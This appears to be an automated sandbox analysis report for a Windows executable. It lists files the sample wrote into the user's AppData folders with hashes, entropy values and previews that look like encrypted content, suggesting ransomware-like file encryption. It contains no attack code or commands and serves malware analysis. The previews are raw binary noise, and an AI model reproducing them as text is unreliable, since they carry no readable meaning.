SHA-256:	89E4CEA00500EBF7496ED1C9047C5713D985415E0BB60DEAF4C5915DEAB2F035
SHA-512:	4CC3EE6F7CD882B42E04AE03F990AF7EF78644481B36B00E7F575ECB06C5A3836B40EED4C65E1BDB1C9179679CB35CEFFA8748328731765DC289577910EB9423
Malicious:	false
Reputation:	unknown
Preview:	1,"fu..n.......lW....tf..K..m..mp..N....,.=k9.G.1...j..z.......q4.1.$...KGQ..j4I..o.5....`.Le.Jy..A..b...s.\|oG......n.y........]..g.G....1...^?t....Nv].m`c......Hm...`.......v.Ja..+.(........C...V...H....c..G.....nQ9..J.N0sx....4... ...CS{...x..u.4.MB...7.o.C.1.l_G.!=.OA...'........0...4...0...4=R.>B5&m....i.NA..<.../..h.K....?.I.B3....bq...:._..Y...I_............N..ZQ9bT"U.}..\...6.s..J.S.y.@....S..P2..c........f\|q!T.$;.p.....l,"MY.'.Q.>...OC.....9......r...H...Vi...\.L.L.sEF....H.D5...!..........M....p...!X.j=.d..y.$..IO#..^....T.. R....(...A...=8.d..N"..t.U`.yz.=.Uw...,.D...J.9I..@.....2..gl.A%.Aoj.#...8.xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NGenTask.exe.log

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	976
Entropy (8bit):	7.791710367515923
Encrypted:	false
SSDEEP:	24:veNQP/JgbmpK9sFA2hHgABuPTlD6Cjz/jD/GxeWFbD:vNP/JgKpKdmebnjWVD
MD5:	FC5080D9903001C607443319234E0196
SHA1:	ED24E5593DC94A6D7F0B4352E5832E2C051B8815
SHA-256:	A20B8BD48FB3AF94E20459F9C7A3DD08A43467EF7EF7E0C838C330EEDC33AAAC
SHA-512:	0DB653844FC86206F590EC785A4C60EA61A2F418320A999FE480E62738A20B32D7A182AE5EB25D9DB621E1D7D9A344303CAC4A66E24B16B0F050E9570CBB6E1A
Malicious:	false
Reputation:	unknown
Preview:	1,"fu..1..X..21......~...c./..).U.m..T.....9.r.....~..K..&..em.b...._.H.pFD.!....._....n_6..D...2......TAV.<...a@!.....C.~.%5.v..Q.[.....r.GC2@....^nG.<g...:E<..F..../%)u{.\.....b~..7.......1..7C..?..Se.c....Y.1..qV.xql..^a.$....".Z..H&.j.Lz+..;....C_<..V..}.........<..0..R..4e........x#..'Sn..(...D..U;.(...1...v.......;j..................x#...XrY2N.P....y.-..7.-A.z.`.......+c...`......C9.(9u..Z..H1..j...U.c..[.[c./ .O......P..7)yVI+%..10Z.6."CT.......Xh.~:...z.5z.3.H...4H....F.%U.....E....L..+.Y0.....J.P.<l....M.i.wNi._../.m!.V.g......=.O.H..Dd:y9PQ...<S........j..A..y..0.@..+u..26.qL...&.wZ5.u.%.[..8.c..]YQ.G.d9.....f...._...)o...i..DfFO._6...f.......]..c-Uft^.....K..........R..iSX.....'.1it..A....R..8.%.+&..N...:...{w.....}...'.}.S.!.....}{....9.]ex_..$B.........M.G..p.SM..#8O'.>......B.E.!..v%...VL.M@.....K1.r.../..Ov.Z....y...Ff....>`\.I!.9xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sdiagnhost.exe.log

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	6137
Entropy (8bit):	7.968931850137115
Encrypted:	false
SSDEEP:	96:QCFqLX0O/2afZyGQdCPOFvm8EAHP/qzyX+ut/T6MJFvT2cRSgZaKolljzB9Q92b9:QNDnb4FdvuAn3LrDJFvp7aRlRp3DBvN5
MD5:	CA41CD05921AE4AEEF476B80271BA1BC
SHA1:	6CFB473B07C6A8C21C5252B36D41F9C1E33B1452
SHA-256:	10A744191B1198826689FE14230CBCF618A5BD6380763DB0A82B338BAA07FD78
SHA-512:	A3A3AAA99DA8F3F86AC5431E70C87EC03D824261AA138B60F0892EAAC9D442705398A41AA0196AB3D1C78542BE1E4954AA0D84EB6F7B415BE56455D0213C9CEF
Malicious:	false
Reputation:	unknown
Preview:	1,"fuA...Xa5yxb,....cHm.p..e.!....82.j.uj.5r......K.4..8..i......P...c.......<..s.6gb)........w...(A...6....lW.I.j.U............V.+....K..,.....6j..8y.F08...{,..A..m9..W......>..z....2.0.>,.~{...;..}1.w..7....zQ...p..a..A9.+I^.~..HN..I(.L..A..].'.L@:....T...Q.>.2.q.m]..A.Z..........7.b.?... .b...B.\..?{.lL......M...ok.<-bQ...._3..D0T.]..z.....f`...,......k...5B.....GR.i.....6....f.hX.6XT.8A..<....l.u..z{.@U....QH....U.xD....}<.....\|.3.~..O(-T....\vW-..N....7.p......V.....Ed......(U.....V.A!.d@..H@.#.f.)+C.......Y\.......o_&.J..A.u........0.8cd..M9.}LWR.&..w.4,..fv...B."+....[u.......O..\X.G.\..$.q\t.....ZP.^G..x.v3.e..Y.0....}3QN...c+\.ea0....`D..\|.Ly....$jjNw-.l.........B.+..`...D........DD.(N=p.V1.......?..a.U9..'..E). M.^.5O....%2]}0..i..........l..B.Wr..6o..W&d..z\M..V'.Z.trc.xy@L <..:V.No`.!.. &.S...h.;....69.&.&y.G%K....A\2......../Q.%..];c+.}..n..M.r..g}...P.....dyRx.......Jq..t...w.P...<.$...+s...].:..b2S..3L+...8..b.....f

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\ngen.log

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	669
Entropy (8bit):	7.677621185117862
Encrypted:	false
SSDEEP:	12:LSnE5HU9kN4G9V/X1I9DfmwnDyE44UEc2uJzK0AhhGJzKIiDj6Z3cii9a:L+E29kGsVNyDfmAv4z2YK0AhwJkWFbD
MD5:	D5624ECFE9766902128A8B5B3F905471
SHA1:	34BC67DECD1BCF3425E39FA64EC2F9DE280B7CA5
SHA-256:	5F9CF9D893D8C7499C38E1BBE0F15C2220D1603E4CCD0BB690C43422D0FA68EE
SHA-512:	20F95CA821B03A1DBDBFD4EB68D198F37AA84463D2F6C1C55879034037C37E15F6E524DC2D52AAF63D62246082F53712315DACADDEEC86C64D7FF794089B70D8
Malicious:	false
Reputation:	unknown
Preview:	.To....d...A.....{s.H...7..)....2w....g\.+%...!.......:i..Z..z.:...}aa;O!..WIK..F.=..GU..E.....w..N+.l.S.$....bQ}...Z........@%4..EW>c...pm..b..G<.<s.....`...;.v....m.d.+...\|.3..F....".j...6.....J0`..;.T..m.j..3[..T]..8.......u)I....1w.z5..F....{&.......S .hF...............`..=.c5.F.}...:.....H.pps........r..Jc.tl..eD..../..<...lm&P...Q....1..2...b"..H%....'.........=..P....V.i...]Dy .........5..\|[......l...m...@........x..).MW...m."5>.j.....>...2.E.......qW.u.b.\..E.. I..w\f+4H,......a~.G8.B....:6...".e.O.D..e.?+~^.&_."<b..3*..!..6.E"N..........cxbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NGenTask.exe.log

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	7.786675673461144
Encrypted:	false
SSDEEP:	24:qebS6CK9DmgGUWd/tF64eGCORRgNtjWFbD:qebFCKBlCeGCORRgNtjWVD
MD5:	E68948D3982C55245DF3F54919DA5A8D
SHA1:	9483EE2ACCD6D4ADD36F9DA99CEE55DD741503A5
SHA-256:	DD6EF92C50FF8E9A0840582DF1023D37DA551D3880DBC5D32E2FD28B9F9CC08A
SHA-512:	69D36DAB1D977E63A0929A62A778A49A7805E64DE2A778A4ADBAA1C2E24A8DA7B8A4D0567F8EF5AC098BAFB8B8D33C3B87BEAB67185B69D3C5D61C789BF5D44A
Malicious:	false
Reputation:	unknown
Preview:	1,"fu.....Rg$...zC.d.}...^ nG..Y.&..;..3 .x.m......).+...8.......y.r.....}^.+3.....y.N....$.DL$...l&.....\|Rx..g.gL....=...t..^...x_.eP..........Q..s..O......N.../..#.ld'._..q.TqHe$g.U.....5c.B...J..!pXfmm.H......Y!.O..d....Ty.P...@g.........Y.rR.Oq.............0@.. ...+.M.B.".U..\)X^.[yW.9k._.>.......H...6.(nS...>Gb.,.wB .....l..x..7T.o..6....:......h..(...."(1.Ai.$.3.n.~..#....R...~.h..!k1B..-X......U...H.\z....+..I.@....h.~r.X2..6.V...r.......i...S.w.V.....H/......i...w....m..o.q%.0. l........J.SH....g...aH..\|..M^V.o.......t.Y.j...N.J.$.P..L..`../..&../>...K[..#....78.:r=.;?..ud..KO........).X......J..g....q.v./...&M)..O.6+...Zlz...g..>..9.".h......cc..oNmb...4.s#+.<...o.r....F.*..}...........4!...AM .~.9.\|...P...vZ..t'3..xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\ngen.log

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	667
Entropy (8bit):	7.696052657859435
Encrypted:	false
SSDEEP:	12:qsOw+lNWO9ISlJV5dW1nsM6lylJBfqPn+sbjoFYSWvvujJ+8lFdPbzHbBXkLRftL:qLwi9SyNMNden/lLuxnHbNkLR8jWFbD
MD5:	A6474F020DD44CEF2F1754D0D11932A2
SHA1:	41457F70B0B7145A4C315DC3483D6CFD1AA0CFA9
SHA-256:	50E1E29B28ACD573BB576FF87F3896DAA308FF5D01B75EBD47800EAA665C0123
SHA-512:	0F959E6EC7FCD07EE0816A2425490244B8A2CBCE3F50DF6203ECB9884C1A67724C6CE74D8B1CDB7E4E6F016BFF248A601124EBA32C19ABAFBE26E2D251AE5B7D
Malicious:	false
Reputation:	unknown
Preview:	.To.d...F.;..rP..._.i[}..u....A.#....c...dj..`.+..D.D.@S.<.5.{...}1...ki.......?g\...U.S.....(..T0.,...~......U`..IO....mpe....P.....@..y.K..r....Av..+d2..CK..\>.H.1{..u..FQ,+...J.xtAk.A...Td.\..p.cX.0...V.~...SR..D.....B8.P~.4.e...4........n$].e.....y...FW...s..FC.W.NQ.......#.43.(K.A...V........x....D..4_`.R6;...@...Iwk..xt.P....&..%.P....#.........R..>.........:)..z...j.Ec...s.i.1. ...=S...W;..K<..m...Z.L....:38K.{..g..?..<..........f.....b<._..=g....,f.....7..?.3.I]_... g...:X.X.B...j^....}{.:s...oX./............4x...c.ho......".H.......+"..UxbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	234061
Entropy (8bit):	7.512009771468643
Encrypted:	false
SSDEEP:	3072:QnRBx4d/+eeen9KElf9o8grmxSyTpgd++TFlKxizq/j1I02G:YbCd/+de0Eh98cTgjTFlKxbbx2G
MD5:	2404FB82E04FE9727BADA7C53DD02ED5
SHA1:	8E215E6A94EFC8B8034812F9A1F1A74A8AEF8669
SHA-256:	25BD29F594B87F465C16343483784D88FD3DEE8809CB4F80E9BDC48355D976A6
SHA-512:	AA6258AA3616655CC926787D2976610B9E1A5EAD9E23CD62370FA4495451B57088D5CD19C806738BB0C3CE68695A773CF8F8376D5DAB2E6C8D8D0E565A5DEE45
Malicious:	false
Reputation:	unknown
Preview:	.<?]l..'c...2..,..P.?..a\j..2..hq.1CX/....h......6.....3.....e6.Z....`"2.C...].....!....M..K.q\On..(.-...n~}...._....T.[\@J..Q1:.6(E.../.._...2...B...W...mq$.g.u......?.9q2..."'....R8.l...^E .~I,K..D...nm\Y....E.............[..h.;.w..D~.R...>I.@5.z.........5y.q...y...lh.^`4...lo...r..{..G..A.H~p.....KD....6..DT...(.4\.\|.~ .[$.5.cw.z....K....t.U.....3...U<....jo.&.:....K.......=...)....{o.......R.;.>S...<.....%.5....;0.[$.'.Hq..Gb.).G..m..CoV...k!...Xz$.2.WD......q}\|.................aH.......3.R...^.mkH~..6d2.r.r.\#.%..Bz.s.. .g.f{3#.......\I.....<......&...S..;.E...c.A.2....B......j.w..b..ex.#>.&}.H.....]W...Jv..s..Dz-..........."." x.X...~e...F.)WJ<.L......6..(...S...t._PK......l+.Jk..`.2.p...........8Zb.p^.y.=..=.....p...{...P.a,..S..e..8.....;.-..(.....X....?r.`...q`M....=.w.P..(.H.U.....4Pl....Si..H...Fp^....w.-....v.C..0jxN...&.-....J...(K.!...~.[.Q...;..E~.....[..m...... h...4.. ...0..{R.~.r....\|..d..Z.E.y.....jQ.=`.......^P...y..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	49454
Entropy (8bit):	7.995798559750658
Encrypted:	true
SSDEEP:	1536:dbJT82ooNmSCzNpEYGFjxh6BPmrkAeZaW1T:zT82o1CjXQ+krNF
MD5:	19996901E7A0D26431690F06C562F7F5
SHA1:	C4E5713377BABC076758C312C9B2298EABB21551
SHA-256:	1867B3CF49F6281D19B8182CEEF82AE95DAE8E4E743AF1570A4A030A2025F2B7
SHA-512:	E7D268AEA07B6245192FE3AB2177EFBD0B502869C14DFA79C7BBF50C10B25B9906008BFC9BBEBC6DB070A0AE3E424FDB5396D5A8CE8C043105A97260CE655083
Malicious:	false
Reputation:	unknown
Preview:	.....@K-(r.,.. ..m`^..kW/.....2.....Li].zd.Xm).g.D.C&..=g...r.U... ...'.(4o ..<........a...LJ.>...&,>PJ+S....-f\.F./!a.~'..1.T.C.....=......6...s1'....y.Rrq.os_.l.....x..b@..S/...>.....J...fp..&......Y..j..J.g.r........:..p.T.<...B.tm..G............2.P2....D...lS.......KC?e.Xz..uL....Z(=...a<..;.......;..c.pX.B]...BY.9-G..&b.L.f.0=.{.ux..F\Zd.9.B,...e.#j.a....<".6.w)rG .h...W..3.{....g..iZ...r.......d..6~X..=.1..\.1.!..Hj..Ph..I.....?/Y..Th...{......w...}...S.?C..4k...oM.v2.....oB..H...?.Hh..q...#Y.....n..K.C..'.N.\...)...j.#R.a...c..........).......C....F....Q[.LR..B.Z..=1...oi......>..?l..kdq..!....y........H.......Z....0.#..w.h.&.u.[T.E....[.Z.!...6...d...4].Z.2....m..g......^a2.(.}.?...U........&...,...J..F?QK....(.s....7.z.U^.....,i.i...I...a.?0..j.........Kyq.EC..\|.V4....>.%...jw.G...k.....!.F.'....*ic{v.z.wy.:B....(^.>.....L...\n.....nz..<._...1....D..KU.......\|(M.G...V.f8.e..@3M;]l..h.....&.'?...cU8....u@..M..}..U..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	35951
Entropy (8bit):	7.994104717121171
Encrypted:	true
SSDEEP:	768:Bv+JnQVaViwn8/T5H6PaXcGDXnnxp2IxACJjcfQeR6TQmTu:B2Jn+yFn8Fa8cGXnLLbrQm6
MD5:	CC00E06C550683BAF6FB26C1BBF23DAE
SHA1:	A2DA90442C52564FDDE302D100D4FDD2F5B410BE
SHA-256:	17614278FD7B8899C73B041B0249BE699B640CE569FBCC0C1689C8290F4BBA6D
SHA-512:	B40B2F03D471212FD2BFB8479FA53273D455928B491DB2E555823AC5B70DAAB10791C637F3581422BA6016BDBAA221CCA5A5D07895220181521E8C46A8B0F998
Malicious:	false
Reputation:	unknown
Preview:	..... ..Aw.S..?.+..\9.>...Xx.m.6.T..u....u.B@......kPjF....I.@....%]1B...z..T.......B^n..}x._..{....0.1.H.4.x..5.S.P..uD...Sm......?...5..V.....}...3.BF...)...B......m.r....v.....Q.;2N..,.LZ..EL.;0....^..L..f<.v.......zj....c.z.1..................vc.7.\|..O...=....@4..V.(....EP<...w...^Sm.M..78.v..~6o........yr"8.t.......F....M-.)...Z...duq..f...e....r....7.xy....>fY......q..A..J..r. ..:ub-4s.....C......y.>..&..3.<].jR.{......Z..g...*.b....;..G..../ w:...kM.....Z.....~.\..t.u...fmK...~.'d...k..z>T.1...C.a...>{6@]..c.6h.4.......KCQp....S3b,N..oA....eo.#..........2W3.e.XA.r..h@...j...<.\|.u$.y......s_..#.cX........fR...(..[_.@l..N...{.#(.....'C.....<P..01$...3...t...V._w..S!.#6.TI.....R.'I.q......!...k\|`..9O....T..scP...b..P.S...7.......XX...P.v6.bM...<.c"........Y\|.b.N..AO.W{.o5........<......`Wr.$\..m.;.q...p..:..Z..4.)ox..i......P.... XZ....I..-].....1...j]...F..!.H...=.o.G.o..O_zBD....X.O7....Y.......(.G};..(....e.]..oS..W.(.NEv....+....

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\VersionManager\versionlist.xml

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	16179
Entropy (8bit):	7.989419758127256
Encrypted:	false
SSDEEP:	384:m3te75roqdoufTXe8TRbOEujhXdga4LCsgGNAPWmVzdnqnm:mo75roqW2KFd9mBT+tvnT
MD5:	2788294673A920FBC4C988DE7D6539A1
SHA1:	B5D80958D4B022CEA5F9F9E54F56D359E6CB872B
SHA-256:	3B8DC9CC66E43042A1DF7AFB47804D7B92EFC23CE676DC8746CE585366651E2E
SHA-512:	AE9A3EA7599D1DCD6BD3A0082A10D7F04FE4C777B6CA3D32B0E44AE908CE0C5B2AA0EB25C4053F759680E5690080ADCECD361D40CADD693F9A26D14D647031BA
Malicious:	false
Reputation:	unknown
Preview:	.<?.D.9.R....+.r.............Z...)j.&...`B.Q......3.c.+..sZ.A...U.7r.%#3-.1".../....5a~. O>.4[)....fC......s....q..=u....!..T...4....y.i....3../.F.=.%.N.1..,...o..sE...KH.(.YZ]s.L.@.>.....(.g.....ym....{.SE.v?J^.:lX]....u.)-..7A.A.A.F2.g<......zf.,.E..q.I...N..@.Q{...PDfE...J.....[\z..T..Qr..L..Y...e..!.......\|......X.(d;.C&.z\|.a..+]07....g.\9.8..3}M`.wq.v..%:w0..F.8.p..}...5<..K.;mp.3..........._.$...^.#eXr.h;........YA.7!.k..4..wV0.7...0{.....P..%...K..h...QO}.....:......l.. j..$..b.....v.......1.%.../....W.m.7T....Z.lt../.f..9.4U.L....`.){.<..1Le.....O.0.K...{./,.0=HV.c.K...C.S..V.NUf^.~...2.syQ.x..uV..R3..V'..........v.R...h..N.}]-.l..=3...i..[ZZ..-.M.kl..P. ...BX...@..8.'.e4..R1......s.7'c..U........p..s.......u..y..:..ra....Oy..g......p2/...../.<.N5....gq.o.@......2T........$mI.&}+p...@:..c<...N...TEu.yVc.v...KfE....M$.d............A&..!.OQ...(\|....%....}m.`...{.V.._'.r....6.....Ar.."...l.MKf..@......T....7dlOJ(.}..en..>...@

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	6910
Entropy (8bit):	7.972009826231827
Encrypted:	false
SSDEEP:	192:8nOqybX95N73v7uwuwn76zcAsM4zsTGtbRkZPouH:Wm95Nbv7aw7IcnMrTGsei
MD5:	03A3B4D0C0E26E802F13135173479E76
SHA1:	5CF077AA9BC8B8F09FBB42F864137991CB89CCA9
SHA-256:	70D6324800A4A7FD20056C8E0A5A64E076194A9F21774A6378A8B0FEC7BFCD92
SHA-512:	C2172894F6296302FE466CAF4EF9A1DB84A2472EF2503A1EA58BA5F4B11252F331A665D46B46D00549FCDB9CC78ABA9F79A89A042F7C88CAA0239687013D2FF2
Malicious:	false
Reputation:	unknown
Preview:	06/27o'..Z.c.[=..w.N,..:.efW.Y.!.I._.C..N......r..R(..ZZ........Ed.....e....F.o...-\.y_..sp,.v=fP..`..v...Qt..G...8n7.....z<..7..j)...4K.}...T..$.............76.~...B.6B.L.W...IB7..+-.....{.....lr.....X..S..L5u3...9.,..J]...e3/....O_....I.x^t.%..g..p!...s.dYj.-Q...s<..1.=..}$$.f.j.J.d...f.v..H<E.W.Jt....b.Bod.......=.._kz...........N[..f..%R...;f....#...k.Y.J.."g.(k`...-(.....(#.....Ec..(E<.[..#7u..4zh.f.i=f.>....L).'...w.6.f...?..4/....W.n.6.u..O.~......,B%..Z.O......Bg..t..%.....^9....1...J...e.1'../...O.\..%.".?6.p.lAG.vb.b.4UqR.P.!.i.v....>.T.a.t..\|/...Rk..,O..?..u.F....!Y0e..A~......_.6?..........J.....6=..4.U.w..B.}.Y.c...q..\.]...5..=.....s.h...#G.}..K.f..mu..w(U.\..........W..j]........YK..'Dl..(..U..Q0y.....Ra.I. .....k..gw7(a.'..v`..F....6.. ....3W...;. .k...... 8.Q...}t$.2..wN..?g;.....6.V\|M.....C.d.S..f.WB..h.E....;.mh.....!!.n..%.-.....f...........r...hZ......<._W........{m..~....9Z.lED.^....d.... `+.....*O........k.

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1082
Entropy (8bit):	7.829799156295188
Encrypted:	false
SSDEEP:	24:QZw5t8SKbUFNXqRJNrF6Vf2cuAgCr0bBIAFvaKNV7Zl5Ohvvn6OWFbD:6wQUFs9rF60hssFv/V7lO5vnxWVD
MD5:	FD5902FC9AC50802A1C47B9317F5FC6B
SHA1:	DA4A27286B1984D58C6B80A8FC03BF79A3A62FEB
SHA-256:	96C28F2707A3C3B04DC7B32DE49DC28E30680CB280B43E9819220DEF86AD2787
SHA-512:	463EC1859D4423B2DF978E44578410F04EBFEBB0C8AA196B1953594A414A417B3F7B8E21F373FE5F7D0B79BC42B9C31361AC1684F81326CE6165A92A53AC9F60
Malicious:	false
Reputation:	unknown
Preview:	..E.xI..q......W(..C..5..F}.Z.$7/zE.](...)2..R7.6e.1i........l..(..D.d..y..?o.t.i.V..P.^.q9<`.......n.B.:..dY`.......}K`u......#......)!...M...DK.@..i.1.ku.?._.}.~4.9I......s.jI..!......7..y>N+.qal..s.....z.r.W.'.y...p...J>u....._?...ra ...t.t....R.q..\.,EP...=..zz.l..D..\|o..fcp...H.....ZCjz....!HX.XG......mY.i....2../...A$:.l..I....id.......\|e..M2.(>.P./..'..#..........u..%."...+%.;^..S..(3e...!.^.F.^......(...(....W."S(v!..R..=[.o..n.....m......./..Od^1G.-.g3.y4..V.....w.k.^....j-..?).m..F.e.5d......j@..x..h.Y.\....].rl\.OH.3.....L.q..n..?WA1h....g.......Q.18n...5.w"..Z.q_..).M..."...C... ..cy...$.x..mYi.<.`.........}.{.a.9.......Y.\|....1w..r..}.=2.N.Tub.$R7..I.7..y. ......+...V@..'"9...\|O.....V........:...q...._..)&x.sG../....]$5.K,N.d)W...01.`...)^... ..cM..t...t......u2.s....>...[.O.......>`.P.D..es&.`{H....%........L..8@.Xcek.Dr..m.....k.(.H.....{.%......J.....L....S...;..0IH.]..-.....bd.`....B.UI...#C..X....<

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-UserConfig.log

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	1648
Entropy (8bit):	7.900554494140799
Encrypted:	false
SSDEEP:	24:QOFMjBUlwbwEcoGaxsJX+436gyFmvHUPmYDdsfwCqjRbt3T/OYkry5sWrFSwL5Wt:4SHEIaxC+y6HyUnsrSFHkuGW8wL5WVD
MD5:	99E9070E936D5A9E9D885409F98AAAA8
SHA1:	0DAA00F7AE6E94404D54C601B1E44DDA1340FEE3
SHA-256:	AAB79573430530A97CADECCA16EBFCD855F872C740DC71195A82BC74A01B652D
SHA-512:	EF8CAADF17C956E206F7FF28A7A7C22E65A4D81060B09E4F50DB8512BA8C89D90518500BE37D6E94DE5853089AA7C5C50C0E82D9E57C4F754EF49298A52F85D8
Malicious:	false
Reputation:	unknown
Preview:	..0.6...... ......Sl.^.....:C.. )...\...}.Wn..z..<r_...9....5......j.tR..v..9wT^1.FAN.......\?{.Q.gRR..!^.o..4_?......I.Z..1..McH...j..oE....:..e.....%..3...j.1.DJ.?./.I.b/.q,..+ {;c.i.o.......n...U.B.7v...U#...p....[.9.....P....9.....H.;.-....o...1.N..D....4#.\..`.q.%.pu`+....=..K.m.Z.vJ~.n..2u.....P..2....L..+...I(W.=.>..@...(..EU..E..<Z...kU.n#sJ...)..Q.y[.e9...eh.P.-.>Lu.z.\|...4UO..1.........o`...<..s!@.Yb.g..V..o.y.....<a...5...meH...3.{.......=....q".Kq.}...^O..1.=.....R.vu{.MGK.Z.M..[......2(.n..i.fw8.a...HH...bK.F..;.(....A@S...Mj...\|C......'~.7%..rX.~..].L.....R1%".#...._..r..M.P6.1o.=...hp".<.<....)..(.O..)..K.7.-....Bzc.=.=$..D6...X. >/..N...A.?mjx.x.).......R..#...2-..Y......H.c:}R.d!.......!.+..\...w0.x.!....t..3....z.S!j.$......A..Zd.\,...<Q....e..d.._.!Q{L.Iur............y...D..e...~.%f2...v...O.%./sP..(B..*.......F=..m....6....Z5t............u..(...l..cf.o>dN........>.K.....C.S...Z.8n....>...^.qmr......I.&..vE.9

C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-100.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	986
Entropy (8bit):	7.770369853948399
Encrypted:	false
SSDEEP:	24:HSW2uWP7i5GQQR6VDIKokIfoWd5Pz1mcAfGrbiWFbD:yVpP6pS6FWd95TYGXiWVD
MD5:	CD061D76E6BF071B38C198680374632A
SHA1:	E11E65553795A4AC3A33FAF47CA93646BCBF5EE0
SHA-256:	FF3F49D95919208C7E4CB5DD03E783BAD028181F15AD5DBA6344862D1820550B
SHA-512:	C1C0467AF675EF22BFAD0DF38ED3732FA143E8666304A78682B228061B59670BFD1E083D87873F4B3BA76DAC3D7701CE3DF4876B616C2825D6FFB879B22CAB67
Malicious:	false
Reputation:	unknown
Preview:	.PNG.T)I.).>.A7b....4..O.l...RB... ...Nh..!.n.z.....`...:3.m.\|.Z.wb..-.\..Q._.N..-.1 m...?......Bag..N..~.,..H...^.X...'-..R....G.`.!...X\.[...1r............2...$H.E87.@....j.N....L....8Dn'w.]:2.....d...a+...!..#n\....E...N.[.....Xo...'{N&.<..m..3.e_.$Ll...,.r.......(.z..[~......;G...D5...r..Qmed}Zef..9Gi.9.?.V^...;.$...Z...L.V.....u.... S.N..v..QP.H.'....E..y(..8..H./.-.vk.F....#.../.......2..Ly.fk....\.v...fkx.......<7...a........37.......n ...l...B.....~k..x..c..p......1.\|...0\| n..J..........\|N.../...1....LP..7.X.QXd..t8`K.7.\|...i.J.^..0G....z.U@r.......$Y..S..S..\..o..\.vX....`c...l.4...d..l.37.bM.X..[..pe..gk(W.Nq.....2U.];..xgT.i=.....\Y..+..B.....g...9..g....y.\|.6u..c\|n.\.."...I...vIb.?.$bST..d./T..T.#...!...J!..i......-.zq\.]#.>qE .pZ.p...L...&g.f.u}.).!....DY_..B...u'..........2.qk....*~.0..s....`}.......x..\..b....Au.h!....d\.dxbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-125.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1182
Entropy (8bit):	7.832312902757137
Encrypted:	false
SSDEEP:	24:TWgetzbAd7VB0/b9o1ypKYPiG76yobv64OpQIwsicA2OWFbD:Fetzk7UqATiGpoYQ9VPWVD
MD5:	C6DC0A92F31041CEE5B5F2CA90C6F338
SHA1:	F850DEEB94A74B173C838DB75C64926757D2BEC5
SHA-256:	25E556B387BB42F0A88DD1DB8548D7A8F3DCA0F105186F1BFA785754DA2FB88B
SHA-512:	5011BEDBC0EC975DD7D47BED790E703DF92B50C2C9FD6F4E5EEB7FE5B73A0B0F0C94A2D74DAA0427EC7FD1E10949CAC1A922B466D36A90A56BBB74C93C626BE0
Malicious:	false
Reputation:	unknown
